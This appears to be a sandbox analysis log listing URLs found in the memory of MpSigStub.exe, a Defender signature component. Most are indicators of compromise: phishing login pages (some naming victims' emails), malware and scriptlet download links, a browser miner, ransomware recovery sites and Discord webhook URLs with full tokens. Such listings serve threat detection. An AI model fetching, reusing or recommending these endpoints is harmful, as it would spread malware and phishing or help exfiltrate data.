Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: https://coki.me/epnq7
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: https://coki.me/xmwds
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://colintx-owaupdate.c9users.io/nmadbmt/365.html
Source: MpSigStub.exe, 00000024.00000003.6275006647.0000019790C75000.00000004.00000001.sdmp String found in binary or memory: https://configdl.teamviewer.com/configs
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://connect.statetechlink.xyz/?e=
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://connectoutlook.email/main.php
Source: MpSigStub.exe, 00000024.00000003.6292407063.00000197A4EC4000.00000004.00000001.sdmp String found in binary or memory: https://content.dropboxapi.com/2/files/upload
Source: MpSigStub.exe, 00000024.00000003.6292407063.00000197A4EC4000.00000004.00000001.sdmp String found in binary or memory: https://content.dropboxapi.com/2/files/uploadxA
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp String found in binary or memory: https://contirecovery.best
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://contirecovery.info
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: https://corazonarquitectura.com/94reej6f3mr/lipa.html
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://courieroffice.net/wp-admin/whatsapp1.php
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp String found in binary or memory: https://courieroffice.net/wp-content/post2.php
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://covid-19.freeworldimports.com/vendor/phpunit/phpunit/src/util/php/v/excelz/index.php
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: https://crashpad.chromium.org/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: https://crashpad.chromium.org/x
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: https://crea.N_Dativa.N_De-island.e-m2.net/wp-contena.N_Da.N_Dt/ta.N_Dhemes/creative_a.N_Disland/js/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://creative-island.e-m2.net/wp-content/themes/creative_island/js/vc-composer/RUpDObeysEFp8.php
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://creativechigz.co.zw/themes/newexceltoosab.php
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://crowandmonk.com/90pparcels.co.uk/wp-admin/maint/redirect/
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://crowandmonk.com/90pparcels.co.uk/wp-admin/maint/redirect/?jmoore
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: https://crypto-loot.com/lib/miner.min.js
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://cryptopro.ga/File/apo.exe
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://cryptotreasurytrust.com/vnV
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: https://cut.ly/a2wiit8
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: https://cut.ly/nctboib
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: https://cutt.ly/nbcoprl
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: https://cutt.ly/tbcyxag
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/PROTOCOL.certkeys?rev=HEAD
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://d.lqw.me/xuiow/
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp String found in binary or memory: https://d.symcb.com/cps0%
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp String found in binary or memory: https://d.symcb.com/rpa0)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: https://d2vb4fe3wqkxl3.cloudfront.net/opt.rtf
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://dahamarli.xyz
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://dailcarespop.ddnsking.com/audio/cmfuzhkuyxjta25ly2h0qhbyb3rpdml0as5jb20=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://dancevida.com/css/app.css
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: https://darmatic.co.rs/ds/1502.gif
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: https://dashboard.imadeit.com.ng/ds/151120.gif
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://dasinvestment.us/ty/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://dawnamae.000webhostapp.com/exel.phpmethod=
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: https://debatestage.com/wp-admin/css/colors/blue/reportmaersk.php
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://deenar.com/sashi/y29ylnn0b2x3awprqg5uaxauy29t
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://defineliving.in/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://demottechamber.org/html
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://des4556yuhgfrt.gb.net/fde45tfttyt/?veg54g5=br4hg4v
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://dev-thegentlemans.teoria.agency/owa/next.php
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://dev.null.vg/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://dev1.whoatemyI
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp String found in binary or memory: https://devcellsegovapiwebapp.azurewebsites.net/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://dhl24.com.uk/
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: https://diarnondfireplace.com/dobo/xxx.php?user=
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://dichthuatsnu.com/goodweb/pwofiles.php
Source: MpSigStub.exe, 00000024.00000003.6347522364.00000197A3B80000.00000004.00000001.sdmp String found in binary or memory: https://diplomaticroll.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://diproelec.com.sv/moollll/excelzz
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: https://discord.com/api/webhooks/
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: https://discord.com/api/webhooks/770716126988599316/o7GXYebuPQzx7RQFUD4cTOPMq2gGicypOMyNpFVQsIb9qyVW
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: https://discord.com/api/webhooks/850115118066040833/lcFHGcD2eUjv1zEJO_Ped6EAVU7W44L8X3chfyx9YoIb7YBS
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp String found in binary or memory: https://discord.com/api/webhooks/x
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: https://discordapp.com/api/webhooks/757994001767989269/f3KGimlvr5nZDHyIVt3GF4iEkqvy-je8zsM6MPhPc54x0
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: https://divelpid.my/wp-content/themes/monolit/woocommerce/global/aaie6jbhso9.php
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: https://divineleverage.org/de.php
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: https://djdkduep62kz4nzx.onion.to/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://dl.dropboxusercontent.com/s/e7q3947id2jl6ux/factura6.zip?dl=0
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://dl.dropboxusercontent.com/s/m6q5dhmjpfxes94/ps2.txt
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: https://dl.dropboxusercontent.com/u/611200196/scan637.pdf.htm
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: https://dlya-detey.site/emz/reportdhlnew2.php
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://docs-eight-sable.vercel.app/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/document/d/e/2pacx-1vtrc0l1v7hke7ebcnmumoqomoajhb5togg63zkisb68sj3z7lcmv9ndk
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/feeds/default/private/full?v=3
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/uc
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/uc?id=1hajtdasfuta6vew8d5gjkd_bhnd3pwmc
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/viewer?url=%s&embedded=true
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: https://docs.healthmade.org//tc.js
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://donmilps.com/fex/?email=
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: https://drp.su/
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: https://dumpitnow2138.com/
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp String found in binary or memory: https://dynafivecon.com/ds/26.gif
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: https://e3g564rtdfg.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://ecombox.store/tbl_add.php
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: https://ecosym.cl/firmas/wp-error.php
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://eeyhh567.s3.eu-west-3.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: https://efishedo.info/?tag_id
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://elcoyotedesign.com/red1r3ct/base64email/zgfycmvulnboawxsaxbzqhnvdxrozxnzzxguywmudws=
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://eletrocoghi.com.br/drms/fert.html
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: https://elisegiordano.com/bwvsc2f5zwrac2hhcmtlewfzdwdhci5jb20=
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: https://emvoips.eononass.xyz/?e=%25
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: https://en.czonediver.com/ds/0502.gif
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://english.cdfj.org/giremx.org.mx/excx/aw/passf.php?email=arai.kaoru
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: https://erpoweredent.at/3/zte.dll
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp String found in binary or memory: https://erythrocyte-gaskets.000webhostapp.com/ms/excelz/excelz/index.php?email=
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://esp.adnan.dev.hostingshouse.com/ds/151120.gif
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: https://etprimewomenawards.com/apply2/uploads/w_a/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://evolvingdesk.nl/GoogleAPI/vendor/symfony/polyfill-intl-normalizer/Resources/JsWPVLZw9qr9GFE.
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://excavationtrick.com/dir/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://exploitbottom.com/dir/?code=
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://exploshot.com/24.gif
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: https://expressen.se/docprod/templates/bot_tjansteskrivelse.docx
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: https://extranet.carlsonwagonlit.com/gdsscripts/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://extraosseous.com/zik/
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: https://f.coka.la/6wzxbj.sct
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://faithpays.sowetoinnovations.co.za/khro/php/continue1.php
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://faog.org.hk/scanner/overwatch.php
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://fazalandsons.com.pk/wp-includes/ixr/class-ixr-base64.php
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: https://feedbackportal.download/ecm/ibm/3173379797/converter.dot
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp String found in binary or memory: https://ferra.xyz/glsdil.php
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: https://fersite24.xyz/sa2234332324if3g4f23.php
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: https://filedropper.com/main/
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp String found in binary or memory: https://fileshare24.top/3223if3g4f23.php
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: https://filingrimm.com/ecm/ibm/3149569888/
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://filingrimm.com/ecm/ibm/3149569888/converter.dot
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://find-your-profithere11.com/?m=1&o=hybpdzu&t=yrcrt&u=lb8k605
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://flopyrhnd.tk/pr/lan.php
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://flyaircario.com/i/post.php
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: https://folkloreeconomy.com/next.php
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: https://forbeslegalg%CCFYpowerlist20g%CCFY20.g%CCFYcom/imgg%CCFY/icons/u3BYBjeabtg%CCFYMx.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://formspree.io/f/
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://fpvtunes.binaryprotectors.com/msreal/jreside
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: https://fqe.short.gy/
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://fqe.short.gy/gclxo6
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://fqe.short.gy/j7xs8j
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://fr-an1.link/?e=atloperat
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: https://frabey.de/templates/elsterwetter16b/images/system/hp.gf
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: https://freelanceranik.com/group.php
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: https://friendoffishing.com//wp-content/themes/calliope/template-parts/wp_data.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://fs01n4.sendspace.com/dlpro/20fb7f511bc258709195b9ca0c6c258e/595e5d75/k6zafp/x6iu1omg_2_.zips
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://fs01n5.sendspace.com/dl/23da2e4841c1800d1954130c638d13c3/575d2f1645706e13/ooru9w/google%20ch
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: https://fslqzt.info/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://fx.pb-invioce.online/?e=accounts
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://fx.pb-invioce.online/?e=info
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://fx.pb-invioce.online/?e=m.turqueto
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://gantiatiainzx.us-south.cf.appdomain.cloud/?bbre=zxoiasxz#/abrimvh-&
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://gaspee.info/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://gatipackers-movers.com/wp-content/plugins/(
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://geklne.com/extra/?code=cmljagfyzc5tyxjncmf2zubtzxryb2jhbmsucgxjlnvr
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://geoconsultantservices.com/some/next.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://get.adobe
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://gettraff.ru/
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp String found in binary or memory: https://gettraff.ru/aws?keyword=
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://gez.org.zw/errorpages/load/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://gg.gg/ig6f0
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://ggtraff.ru/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://giahanecuador.com/s/?login=
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: https://gidbasket.com/drms/ind.html
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: https://gist.githubusercontent.com/razdorhere
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://github-production-release-asset-2e65be.s3.amazonaws.com/512295
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: https://github-production-release-asset-2e65be.s3.amazonaws.com/68070804
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://github.com/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Alexuiop1337/Trojan-Downloader/raw/master/fee.exe
Source: MpSigStub.exe, 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Bendr0id/xmrigCC
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://github.com/JulianG97/TextEditor
Source: MpSigStub.exe, 00000024.00000003.6275847061.00000197A4698000.00000004.00000001.sdmp String found in binary or memory: https://github.com/bendr0id/xmrigcc
Source: MpSigStub.exe, 00000024.00000003.6275847061.00000197A4698000.00000004.00000001.sdmp String found in binary or memory: https://github.com/bendr0id/xmrigcc-amd
Source: MpSigStub.exe, 00000024.00000003.6275847061.00000197A4698000.00000004.00000001.sdmp String found in binary or memory: https://github.com/bendr0id/xmrigcc/
Source: MpSigStub.exe, 00000024.00000003.6275847061.00000197A4698000.00000004.00000001.sdmp String found in binary or memory: https://github.com/bendr0id/xmrigcchttps://github.com/bendr0id/xmrigcc-amdhttps://github.com/bendr0i
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: https://github.com/nwoolls/multiminer
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: https://github.com/robertdavidgraham/masscan
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: https://github.com/robertdavidgraham/masscanx
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: https://github.com/samratashok/nishang
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://giversplusz2020.ddnsking.com/audio/amvlbmeuam9obkbqy3cub3jn
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: https://gmaax.in/wp-includes/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://gmaax.in/wp-includes/blocks/embed/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://gmaax.in/wp-includes/js/crop/reportcmacgm.php
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp String found in binary or memory: https://go.wikitextbooks.info
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://goo.gl/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://goo.gl/6bvmse)
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://goo.gl/t4wd4iscrobj.dll
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://goodiebagkanvas.com/m/?login=ithelp
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: https://goofy-davinci-6ad239.netlify.app/)/s/uri
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://gposervitech.com/wp-content/cgi-bins/files/office365html/office
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://grace-memorial-church.com/shares/share/fghjke77383oned/share
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: https://grandvilaformosa.comNOuxgc/NOuxgcwp-contenNOuxgct/pluginsNOuxgc/woNOuxgcrdpress-seo/css/disN
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: https://granelseeds.cl/wp-includes/js/ghost/countrysubjectip.php
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://griginet.com/ggassh/sshrod.php
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://gritodopovo.com.br/doc/reserva.wiz
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://gritodopovo.com.br/natalidade/new.wiz
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: https://gruasphenbogota.com/c74hwggxi/ka.html
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: https://gtec24.com/0mqp0yn6/kk.html
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://h9-mil.live/?e=anita.masyk
